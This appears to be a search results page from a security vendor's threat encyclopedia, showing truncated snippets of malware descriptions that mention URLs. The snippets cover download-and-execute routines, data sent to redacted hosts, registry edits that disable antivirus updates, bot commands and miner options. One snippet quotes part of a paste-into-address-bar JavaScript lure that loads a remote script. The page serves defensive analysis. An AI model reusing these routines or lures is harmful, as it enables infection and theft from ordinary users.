Search
Keyword: URL
As of this writing, the said sites are inaccessible. NOTES: This Trojan sends the following system information to the URL {BLOCKED}8.net:6032 : CPU Speed Operating System used RAM System Language 12
environment. NOTES: Download Routine This malware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals the
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0) 2. Delete the actual address from the url field in your browser and paste the code instead. 3. Press Enter
XP, and Server 2003.) NOTES: As of this writing, the URL where the file can be downloaded is already inaccessible and it redirects to http://www.yahoo.co.jp . As a result, the downloaded file saved as
a virtual environment. NOTES: This spyware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
the malware server Market - view a package specified by the malware server in the Android Market Web - view a URL specified by the malware server 12 for 2012: What Will The New Year Bring? Steals
(Default) = "%System%\MediaP.dll" NOTES: It connects to the following URL when Internet Explorer is opened: http://www.{BLOCKED}babys.com/cgi-bin/mmlogin.cgi Trojan.Win32.BHO.bnwy (Kaspersky), W32/BHO.BNWY
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
\Managechar.exe = %Application Data%\Managechar.exe NOTES: It connects to the following URL via HTTP GET to access other advertisement sites and possibly download other files into the system. However, during
value} NOTES: When a successful connection is made, this Trojan downloads a file from the URL with the parameters {Accessible URL}/get/faa91cf5e79a76602f094ed38fad5872.exe . If the malware failed to
Firefox)/ Chrome Service Pack (for Google Chrome) to certain web browsers: 1.crx (for Google Chrome) 2.xpi (for Mozilla Firefox) It connect to the following URL to update its stat counter: http://whos.
a URL using a hidden browser (POST): Send POST floods (QUIT): Terminate itself (SHELL EXEC): Execute shell command (SPEEDTEST): Check connection speed (STOP EXEC): Stop a specific thread (STOP GET):
Explorer is used by adding the following registry entries: HKEY_CURRENT_USER\Software\AppDataLow\ BHOinit url = http://{BLOCKED}upforsafedd.com/pickit/ HKEY_CURRENT_USER\Software\AppDataLow\ BHOinit url2 =
Explorer is used by adding the following registry entries: HKEY_CURRENT_USER\Software\AppDataLow\ BHOinit url = http://{BLOCKED}pickupforu.com/gabbanauk/ HKEY_CURRENT_USER\Software\AppDataLow\ BHOinit url2 =
Explorer is used by adding the following registry entries: HKEY_CURRENT_USER\Software\AppDataLow\ BHOinit url = "http://{BLOCKED}nevinovat.com/pteradaptelfan/ " HKEY_CURRENT_USER\Software\AppDataLow\ BHOinit
information-stealing capability. Rogue Antivirus Routine This Trojan displays the following fake alerts: When users agree to buy the software, it connects to the following URL to continue the purchase: http://{BLOCKED
Intensity of GPU usage [-10..10], default 0 -l yes|no - set 'no' to disable Long-Polling, default 'yes' -o url - in form http://username:password@server.tld:port/path, stratum+tcp://server.tld:port, by